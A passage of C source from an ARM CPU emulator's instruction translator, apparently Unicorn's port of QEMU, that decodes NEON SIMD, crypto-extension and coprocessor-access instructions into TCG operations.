4 : 2); n += 2) { tmp = neon_load_reg(tcg_ctx, rm, n); tmp2 = neon_load_reg(tcg_ctx, rd, n + 1); neon_store_reg(tcg_ctx, rm, n, tmp2); neon_store_reg(tcg_ctx, rd, n + 1, tmp); } } else { goto elementwise; } break; case NEON_2RM_VUZP: if (gen_neon_unzip(tcg_ctx, rd, rm, size, q)) { return 1; } break; case NEON_2RM_VZIP: if (gen_neon_zip(tcg_ctx, rd, rm, size, q)) { return 1; } break; case NEON_2RM_VMOVN: case NEON_2RM_VQMOVN: /* also VQMOVUN; op field and mnemonics don't line up */ if (rm & 1) { return 1; } tmp2 = NULL; for (pass = 0; pass < 2; pass++) { neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rm + pass); tmp = tcg_temp_new_i32(tcg_ctx); gen_neon_narrow_op(tcg_ctx, op == NEON_2RM_VMOVN, q, size, tmp, tcg_ctx->cpu_V0); if (pass == 0) { tmp2 = tmp; } else { neon_store_reg(tcg_ctx, rd, 0, tmp2); neon_store_reg(tcg_ctx, rd, 1, tmp); } } break; case NEON_2RM_VSHLL: if (q || (rd & 1)) { return 1; } tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); for (pass = 0; pass < 2; pass++) { if (pass == 1) tmp = tmp2; gen_neon_widen(tcg_ctx, tcg_ctx->cpu_V0, tmp, size, 1); tcg_gen_shli_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 8 << size); neon_store_reg64(tcg_ctx, tcg_ctx->cpu_V0, rd + pass); } break; case NEON_2RM_VCVT_F16_F32: { TCGv_ptr fpst; TCGv_i32 ahp; if (!dc_isar_feature(aa32_fp16_spconv, s) || q || (rm & 1)) { return 1; } fpst = get_fpstatus_ptr(tcg_ctx, true); ahp = get_ahp_flag(tcg_ctx); tmp = neon_load_reg(tcg_ctx, rm, 0); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp); tmp2 = neon_load_reg(tcg_ctx, rm, 1); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp2, tmp2, fpst, ahp); tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); tcg_temp_free_i32(tcg_ctx, tmp); tmp = neon_load_reg(tcg_ctx, rm, 2); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp); tmp3 = neon_load_reg(tcg_ctx, rm, 3); neon_store_reg(tcg_ctx, rd, 0, tmp2); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp3, tmp3, fpst, ahp); tcg_gen_shli_i32(tcg_ctx, tmp3, tmp3, 16); tcg_gen_or_i32(tcg_ctx, tmp3, tmp3, tmp); neon_store_reg(tcg_ctx, rd, 1, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_VCVT_F32_F16: { TCGv_ptr fpst; TCGv_i32 ahp; if (!dc_isar_feature(aa32_fp16_spconv, s) || q || (rd & 1)) { return 1; } fpst = get_fpstatus_ptr(tcg_ctx, true); ahp = get_ahp_flag(tcg_ctx); tmp3 = tcg_temp_new_i32(tcg_ctx); tmp = neon_load_reg(tcg_ctx, rm, 0); tmp2 = neon_load_reg(tcg_ctx, rm, 1); tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp3, tmp3, fpst, ahp); neon_store_reg(tcg_ctx, rd, 0, tmp3); tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp, tmp, fpst, ahp); neon_store_reg(tcg_ctx, rd, 1, tmp); tmp3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tmp3, tmp2); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp3, tmp3, fpst, ahp); neon_store_reg(tcg_ctx, rd, 2, tmp3); tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp2, tmp2, fpst, ahp); neon_store_reg(tcg_ctx, rd, 3, tmp2); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_AESE: case NEON_2RM_AESMC: if (!dc_isar_feature(aa32_aes, s) || ((rm | rd) & 1)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); /* Bit 6 is the lowest opcode bit; it distinguishes between * encryption (AESE/AESMC) and decryption (AESD/AESIMC) */ tmp3 = tcg_const_i32(tcg_ctx, 
extract32(insn, 6, 1)); if (op == NEON_2RM_AESE) { gen_helper_crypto_aese(tcg_ctx, ptr1, ptr2, tmp3); } else { gen_helper_crypto_aesmc(tcg_ctx, ptr1, ptr2, tmp3); } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); tcg_temp_free_i32(tcg_ctx, tmp3); break; case NEON_2RM_SHA1H: if (!dc_isar_feature(aa32_sha1, s) || ((rm | rd) & 1)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); gen_helper_crypto_sha1h(tcg_ctx, ptr1, ptr2); tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); break; case NEON_2RM_SHA1SU1: if ((rm | rd) & 1) { return 1; } /* bit 6 (q): set -> SHA256SU0, cleared -> SHA1SU1 */ if (q) { if (!dc_isar_feature(aa32_sha2, s)) { return 1; } } else if (!dc_isar_feature(aa32_sha1, s)) { return 1; } ptr1 = vfp_reg_ptr(tcg_ctx, true, rd); ptr2 = vfp_reg_ptr(tcg_ctx, true, rm); if (q) { gen_helper_crypto_sha256su0(tcg_ctx, ptr1, ptr2); } else { gen_helper_crypto_sha1su1(tcg_ctx, ptr1, ptr2); } tcg_temp_free_ptr(tcg_ctx, ptr1); tcg_temp_free_ptr(tcg_ctx, ptr2); break; case NEON_2RM_VMVN: tcg_gen_gvec_not(tcg_ctx, 0, rd_ofs, rm_ofs, vec_size, vec_size); break; case NEON_2RM_VNEG: tcg_gen_gvec_neg(tcg_ctx, size, rd_ofs, rm_ofs, vec_size, vec_size); break; case NEON_2RM_VABS: tcg_gen_gvec_abs(tcg_ctx, size, rd_ofs, rm_ofs, vec_size, vec_size); break; default: elementwise: for (pass = 0; pass < (q ? 4 : 2); pass++) { tmp = neon_load_reg(tcg_ctx, rm, pass); switch (op) { case NEON_2RM_VREV32: switch (size) { case 0: tcg_gen_bswap32_i32(tcg_ctx, tmp, tmp); break; case 1: gen_swap_half(tcg_ctx, tmp); break; default: abort(); } break; case NEON_2RM_VREV16: gen_rev16(tcg_ctx, tmp, tmp); break; case NEON_2RM_VCLS: switch (size) { case 0: gen_helper_neon_cls_s8(tcg_ctx, tmp, tmp); break; case 1: gen_helper_neon_cls_s16(tcg_ctx, tmp, tmp); break; case 2: gen_helper_neon_cls_s32(tcg_ctx, tmp, tmp); break; default: abort(); } break; case NEON_2RM_VCLZ: switch (size) { case 0: gen_helper_neon_clz_u8(tcg_ctx, tmp, tmp); break; case 1: gen_helper_neon_clz_u16(tcg_ctx, tmp, tmp); break; case 2: tcg_gen_clzi_i32(tcg_ctx, tmp, tmp, 32); break; default: abort(); } break; case NEON_2RM_VCNT: gen_helper_neon_cnt_u8(tcg_ctx, tmp, tmp); break; case NEON_2RM_VQABS: switch (size) { case 0: gen_helper_neon_qabs_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_neon_qabs_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 2: gen_helper_neon_qabs_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; default: abort(); } break; case NEON_2RM_VQNEG: switch (size) { case 0: gen_helper_neon_qneg_s8(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 1: gen_helper_neon_qneg_s16(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; case 2: gen_helper_neon_qneg_s32(tcg_ctx, tmp, tcg_ctx->cpu_env, tmp); break; default: abort(); } break; case NEON_2RM_VCGT0: case NEON_2RM_VCLE0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_cgt_s8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_cgt_s16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_cgt_s32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); if (op == NEON_2RM_VCLE0) { tcg_gen_not_i32(tcg_ctx, tmp, tmp); } break; case NEON_2RM_VCGE0: case NEON_2RM_VCLT0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_cge_s8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_cge_s16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_cge_s32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } 
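/* The compare helpers return all-ones/all-zeros lane masks, so
 * VCLT0 here (like VCLE0 above) is formed by inverting the
 * result of the opposite predicate. */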
tcg_temp_free_i32(tcg_ctx, tmp2); if (op == NEON_2RM_VCLT0) { tcg_gen_not_i32(tcg_ctx, tmp, tmp); } break; case NEON_2RM_VCEQ0: tmp2 = tcg_const_i32(tcg_ctx, 0); switch(size) { case 0: gen_helper_neon_ceq_u8(tcg_ctx, tmp, tmp, tmp2); break; case 1: gen_helper_neon_ceq_u16(tcg_ctx, tmp, tmp, tmp2); break; case 2: gen_helper_neon_ceq_u32(tcg_ctx, tmp, tmp, tmp2); break; default: abort(); } tcg_temp_free_i32(tcg_ctx, tmp2); break; case NEON_2RM_VCGT0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCGE0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCEQ0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_ceq_f32(tcg_ctx, tmp, tmp, tmp2, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCLE0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cge_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCLT0_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); tmp2 = tcg_const_i32(tcg_ctx, 0); gen_helper_neon_cgt_f32(tcg_ctx, tmp, tmp2, tmp, fpstatus); tcg_temp_free_i32(tcg_ctx, tmp2); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VABS_F: gen_helper_vfp_abss(tcg_ctx, tmp, tmp); break; case NEON_2RM_VNEG_F: gen_helper_vfp_negs(tcg_ctx, tmp, tmp); break; case NEON_2RM_VSWP: tmp2 = neon_load_reg(tcg_ctx, rd, pass); neon_store_reg(tcg_ctx, rm, pass, tmp2); break; case NEON_2RM_VTRN: tmp2 = neon_load_reg(tcg_ctx, rd, pass); switch (size) { case 0: gen_neon_trn_u8(tcg_ctx, tmp, tmp2); break; case 1: gen_neon_trn_u16(tcg_ctx, tmp, tmp2); break; default: abort(); } neon_store_reg(tcg_ctx, rm, pass, tmp2); break; case NEON_2RM_VRINTN: case NEON_2RM_VRINTA: case NEON_2RM_VRINTM: case NEON_2RM_VRINTP: case NEON_2RM_VRINTZ: { TCGv_i32 tcg_rmode; TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); int rmode; if (op == NEON_2RM_VRINTZ) { rmode = FPROUNDING_ZERO; } else { rmode = fp_decode_rm[((op & 0x6) >> 1) ^ 1]; } tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); gen_helper_rints(tcg_ctx, tmp, tmp, fpstatus); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); tcg_temp_free_ptr(tcg_ctx, fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); break; } case NEON_2RM_VRINTX: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rints_exact(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVTAU: case NEON_2RM_VCVTAS: case NEON_2RM_VCVTNU: case NEON_2RM_VCVTNS: case NEON_2RM_VCVTPU: case NEON_2RM_VCVTPS: case NEON_2RM_VCVTMU: case NEON_2RM_VCVTMS: { bool is_signed = !extract32(insn, 7, 1); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, 1); TCGv_i32 tcg_rmode, tcg_shift; int rmode = fp_decode_rm[extract32(insn, 8, 2)]; tcg_shift = tcg_const_i32(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); if (is_signed) { 
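/* Convert with the rounding mode that was swapped into FPSCR
 * just above; the second set_neon_rmode call below restores
 * the original mode. */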
gen_helper_vfp_tosls(tcg_ctx, tmp, tmp, tcg_shift, fpst); } else { gen_helper_vfp_touls(tcg_ctx, tmp, tmp, tcg_shift, fpst); } gen_helper_set_neon_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tcg_shift); tcg_temp_free_ptr(tcg_ctx, fpst); break; } case NEON_2RM_VRECPE: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_recpe_u32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRSQRTE: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rsqrte_u32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRECPE_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_recpe_f32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VRSQRTE_F: { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_rsqrte_f32(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_FS: /* VCVT.F32.S32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_sitos(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_FU: /* VCVT.F32.U32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_uitos(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_SF: /* VCVT.S32.F32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_tosizs(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } case NEON_2RM_VCVT_UF: /* VCVT.U32.F32 */ { TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, 1); gen_helper_vfp_touizs(tcg_ctx, tmp, tmp, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); break; } default: /* Reserved op values were caught by the * neon_2rm_sizes[] check earlier. */ abort(); } neon_store_reg(tcg_ctx, rd, pass, tmp); } break; } } else if ((insn & (1 << 10)) == 0) { /* VTBL, VTBX. */ int n = ((insn >> 8) & 3) + 1; if ((rn + n) > 32) { /* This is UNPREDICTABLE; we choose to UNDEF to avoid the * helper function running off the end of the register file. */ return 1; } n <<= 3; if (insn & (1 << 6)) { tmp = neon_load_reg(tcg_ctx, rd, 0); } else { tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); } tmp2 = neon_load_reg(tcg_ctx, rm, 0); ptr1 = vfp_reg_ptr(tcg_ctx, true, rn); tmp5 = tcg_const_i32(tcg_ctx, n); gen_helper_neon_tbl(tcg_ctx, tmp2, tmp2, tmp, ptr1, tmp5); tcg_temp_free_i32(tcg_ctx, tmp); if (insn & (1 << 6)) { tmp = neon_load_reg(tcg_ctx, rd, 1); } else { tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_i32(tcg_ctx, tmp, 0); } tmp3 = neon_load_reg(tcg_ctx, rm, 1); gen_helper_neon_tbl(tcg_ctx, tmp3, tmp3, tmp, ptr1, tmp5); tcg_temp_free_i32(tcg_ctx, tmp5); tcg_temp_free_ptr(tcg_ctx, ptr1); neon_store_reg(tcg_ctx, rd, 0, tmp2); neon_store_reg(tcg_ctx, rd, 1, tmp3); tcg_temp_free_i32(tcg_ctx, tmp); } else if ((insn & 0x380) == 0) { /* VDUP */ int element; MemOp size; if ((insn & (7 << 16)) == 0 || (q && (rd & 1))) { return 1; } if (insn & (1 << 16)) { size = MO_8; element = (insn >> 17) & 7; } else if (insn & (1 << 17)) { size = MO_16; element = (insn >> 18) & 3; } else { size = MO_32; element = (insn >> 19) & 1; } tcg_gen_gvec_dup_mem(tcg_ctx, size, neon_reg_offset(rd, 0), neon_element_offset(rm, element, size), q ? 16 : 8, q ? 16 : 8); } else { return 1; } } } return 0; } /* Advanced SIMD three registers of the same length extension. 
* 31 25 23 22 20 16 12 11 10 9 8 3 0 * +---------------+-----+---+-----+----+----+---+----+---+----+---------+----+ * | 1 1 1 1 1 1 0 | op1 | D | op2 | Vn | Vd | 1 | o3 | 0 | o4 | N Q M U | Vm | * +---------------+-----+---+-----+----+----+---+----+---+----+---------+----+ */ static int disas_neon_insn_3same_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_3 *fn_gvec = NULL; gen_helper_gvec_3_ptr *fn_gvec_ptr = NULL; int rd, rn, rm, opr_sz; int data = 0; int off_rn, off_rm; bool is_long = false, q = extract32(insn, 6, 1); bool ptr_is_env = false; if ((insn & 0xfe200f10) == 0xfc200800) { /* VCMLA -- 1111 110R R.1S .... .... 1000 ...0 .... */ int size = extract32(insn, 20, 1); data = extract32(insn, 23, 2); /* rot */ if (!dc_isar_feature(aa32_vcma, s) || (!size && !dc_isar_feature(aa32_fp16_arith, s))) { return 1; } fn_gvec_ptr = size ? gen_helper_gvec_fcmlas : gen_helper_gvec_fcmlah; } else if ((insn & 0xfea00f10) == 0xfc800800) { /* VCADD -- 1111 110R 1.0S .... .... 1000 ...0 .... */ int size = extract32(insn, 20, 1); data = extract32(insn, 24, 1); /* rot */ if (!dc_isar_feature(aa32_vcma, s) || (!size && !dc_isar_feature(aa32_fp16_arith, s))) { return 1; } fn_gvec_ptr = size ? gen_helper_gvec_fcadds : gen_helper_gvec_fcaddh; } else if ((insn & 0xfeb00f00) == 0xfc200d00) { /* V[US]DOT -- 1111 1100 0.10 .... .... 1101 .Q.U .... */ bool u = extract32(insn, 4, 1); if (!dc_isar_feature(aa32_dp, s)) { return 1; } fn_gvec = u ? gen_helper_gvec_udot_b : gen_helper_gvec_sdot_b; } else if ((insn & 0xff300f10) == 0xfc200810) { /* VFM[AS]L -- 1111 1100 S.10 .... .... 1000 .Q.1 .... */ int is_s = extract32(insn, 23, 1); if (!dc_isar_feature(aa32_fhm, s)) { return 1; } is_long = true; data = is_s; /* is_2 == 0 */ fn_gvec_ptr = gen_helper_gvec_fmlal_a32; ptr_is_env = true; } else { return 1; } VFP_DREG_D(rd, insn); if (rd & q) { return 1; } if (q || !is_long) { VFP_DREG_N(rn, insn); VFP_DREG_M(rm, insn); if ((rn | rm) & q & !is_long) { return 1; } off_rn = vfp_reg_offset(1, rn); off_rm = vfp_reg_offset(1, rm); } else { rn = VFP_SREG_N(insn); rm = VFP_SREG_M(insn); off_rn = vfp_reg_offset(0, rn); off_rm = vfp_reg_offset(0, rm); } if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) { return 1; } opr_sz = (1 + q) * 8; if (fn_gvec_ptr) { TCGv_ptr ptr; if (ptr_is_env) { ptr = tcg_ctx->cpu_env; } else { ptr = get_fpstatus_ptr(tcg_ctx, 1); } tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, ptr, opr_sz, opr_sz, data, fn_gvec_ptr); if (!ptr_is_env) { tcg_temp_free_ptr(tcg_ctx, ptr); } } else { tcg_gen_gvec_3_ool(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, opr_sz, opr_sz, data, fn_gvec); } return 0; } /* Advanced SIMD two registers and a scalar extension. * 31 24 23 22 20 16 12 11 10 9 8 3 0 * +-----------------+----+---+----+----+----+---+----+---+----+---------+----+ * | 1 1 1 1 1 1 1 0 | o1 | D | o2 | Vn | Vd | 1 | o3 | 0 | o4 | N Q M U | Vm | * +-----------------+----+---+----+----+----+---+----+---+----+---------+----+ * */ static int disas_neon_insn_2reg_scalar_ext(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_gvec_3 *fn_gvec = NULL; gen_helper_gvec_3_ptr *fn_gvec_ptr = NULL; int rd, rn, rm, opr_sz, data; int off_rn, off_rm; bool is_long = false, q = extract32(insn, 6, 1); bool ptr_is_env = false; if ((insn & 0xff000f10) == 0xfe000800) { /* VCMLA (indexed) -- 1111 1110 S.RR .... .... 1000 ...0 .... 
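 * (S = insn[23] is the size bit, 0 for fp16 and 1 for fp32;
 * RR = insn[21:20] is the rotation, extracted below.)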
*/ int rot = extract32(insn, 20, 2); int size = extract32(insn, 23, 1); int index; if (!dc_isar_feature(aa32_vcma, s)) { return 1; } if (size == 0) { if (!dc_isar_feature(aa32_fp16_arith, s)) { return 1; } /* For fp16, rm is just Vm, and index is M. */ rm = extract32(insn, 0, 4); index = extract32(insn, 5, 1); } else { /* For fp32, rm is the usual M:Vm, and index is 0. */ VFP_DREG_M(rm, insn); index = 0; } data = (index << 2) | rot; fn_gvec_ptr = (size ? gen_helper_gvec_fcmlas_idx : gen_helper_gvec_fcmlah_idx); } else if ((insn & 0xffb00f00) == 0xfe200d00) { /* V[US]DOT -- 1111 1110 0.10 .... .... 1101 .Q.U .... */ int u = extract32(insn, 4, 1); if (!dc_isar_feature(aa32_dp, s)) { return 1; } fn_gvec = u ? gen_helper_gvec_udot_idx_b : gen_helper_gvec_sdot_idx_b; /* rm is just Vm, and index is M. */ data = extract32(insn, 5, 1); /* index */ rm = extract32(insn, 0, 4); } else if ((insn & 0xffa00f10) == 0xfe000810) { /* VFM[AS]L -- 1111 1110 0.0S .... .... 1000 .Q.1 .... */ int is_s = extract32(insn, 20, 1); int vm20 = extract32(insn, 0, 3); int vm3 = extract32(insn, 3, 1); int m = extract32(insn, 5, 1); int index; if (!dc_isar_feature(aa32_fhm, s)) { return 1; } if (q) { rm = vm20; index = m * 2 + vm3; } else { rm = vm20 * 2 + m; index = vm3; } is_long = true; data = (index << 2) | is_s; /* is_2 == 0 */ fn_gvec_ptr = gen_helper_gvec_fmlal_idx_a32; ptr_is_env = true; } else { return 1; } VFP_DREG_D(rd, insn); if (rd & q) { return 1; } if (q || !is_long) { VFP_DREG_N(rn, insn); if (rn & q & !is_long) { return 1; } off_rn = vfp_reg_offset(1, rn); off_rm = vfp_reg_offset(1, rm); } else { rn = VFP_SREG_N(insn); off_rn = vfp_reg_offset(0, rn); off_rm = vfp_reg_offset(0, rm); } if (s->fp_excp_el) { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_simd_access_trap(1, 0xe, false), s->fp_excp_el); return 0; } if (!s->vfp_enabled) { return 1; } opr_sz = (1 + q) * 8; if (fn_gvec_ptr) { TCGv_ptr ptr; if (ptr_is_env) { ptr = tcg_ctx->cpu_env; } else { ptr = get_fpstatus_ptr(tcg_ctx, 1); } tcg_gen_gvec_3_ptr(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, ptr, opr_sz, opr_sz, data, fn_gvec_ptr); if (!ptr_is_env) { tcg_temp_free_ptr(tcg_ctx, ptr); } } else { tcg_gen_gvec_3_ool(tcg_ctx, vfp_reg_offset(1, rd), off_rn, off_rm, opr_sz, opr_sz, data, fn_gvec); } return 0; } static int disas_coproc_insn(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int cpnum, is64, crn, crm, opc1, opc2, isread, rt, rt2; const ARMCPRegInfo *ri; cpnum = (insn >> 8) & 0xf; /* First check for coprocessor space used for XScale/iwMMXt insns */ if (arm_dc_feature(s, ARM_FEATURE_XSCALE) && (cpnum < 2)) { if (extract32(s->c15_cpar, cpnum, 1) == 0) { return 1; } if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { return disas_iwmmxt_insn(s, insn); } else if (arm_dc_feature(s, ARM_FEATURE_XSCALE)) { return disas_dsp_insn(s, insn); } return 1; } /* Otherwise treat as a generic register access */ is64 = (insn & (1 << 25)) == 0; if (!is64 && ((insn & (1 << 4)) == 0)) { /* cdp */ return 1; } crm = insn & 0xf; if (is64) { crn = 0; opc1 = (insn >> 4) & 0xf; opc2 = 0; rt2 = (insn >> 16) & 0xf; } else { crn = (insn >> 16) & 0xf; opc1 = (insn >> 21) & 7; opc2 = (insn >> 5) & 7; rt2 = 0; } isread = (insn >> 20) & 1; rt = (insn >> 12) & 0xf; ri = get_arm_cp_reginfo(s->cp_regs, ENCODE_CP_REG(cpnum, is64, s->ns, crn, crm, opc1, opc2)); if (ri) { bool need_exit_tb; /* Check access permissions */ if (!cp_access_ok(s->current_el, ri, isread)) { return 1; } if (s->hstr_active || ri->accessfn || (arm_dc_feature(s, ARM_FEATURE_XSCALE) && 
cpnum < 14)) { /* Emit code to perform further access permissions checks at * runtime; this may result in an exception. * Note that on XScale all cp0..c13 registers do an access check * call in order to handle c15_cpar. */ TCGv_ptr tmpptr; TCGv_i32 tcg_syn, tcg_isread; uint32_t syndrome; /* Note that since we are an implementation which takes an * exception on a trapped conditional instruction only if the * instruction passes its condition code check, we can take * advantage of the clause in the ARM ARM that allows us to set * the COND field in the instruction to 0xE in all cases. * We could fish the actual condition out of the insn (ARM) * or the condexec bits (Thumb) but it isn't necessary. */ switch (cpnum) { case 14: if (is64) { syndrome = syn_cp14_rrt_trap(1, 0xe, opc1, crm, rt, rt2, isread, false); } else { syndrome = syn_cp14_rt_trap(1, 0xe, opc1, opc2, crn, crm, rt, isread, false); } break; case 15: if (is64) { syndrome = syn_cp15_rrt_trap(1, 0xe, opc1, crm, rt, rt2, isread, false); } else { syndrome = syn_cp15_rt_trap(1, 0xe, opc1, opc2, crn, crm, rt, isread, false); } break; default: /* ARMv8 defines that only coprocessors 14 and 15 exist, * so this can only happen if this is an ARMv7 or earlier CPU, * in which case the syndrome information won't actually be * guest visible. */ assert(!arm_dc_feature(s, ARM_FEATURE_V8)); syndrome = syn_uncategorized(); break; } gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tmpptr = tcg_const_ptr(tcg_ctx, ri); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); tcg_isread = tcg_const_i32(tcg_ctx, isread); gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn, tcg_isread); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_isread); } else if (ri->type & ARM_CP_RAISES_EXC) { /* * The readfn or writefn might raise an exception; * synchronize the CPU state in case it does. 
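 * (Concretely: the condexec bits and the PC are written back
 * below so the exception path sees the trapping instruction's
 * state.)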
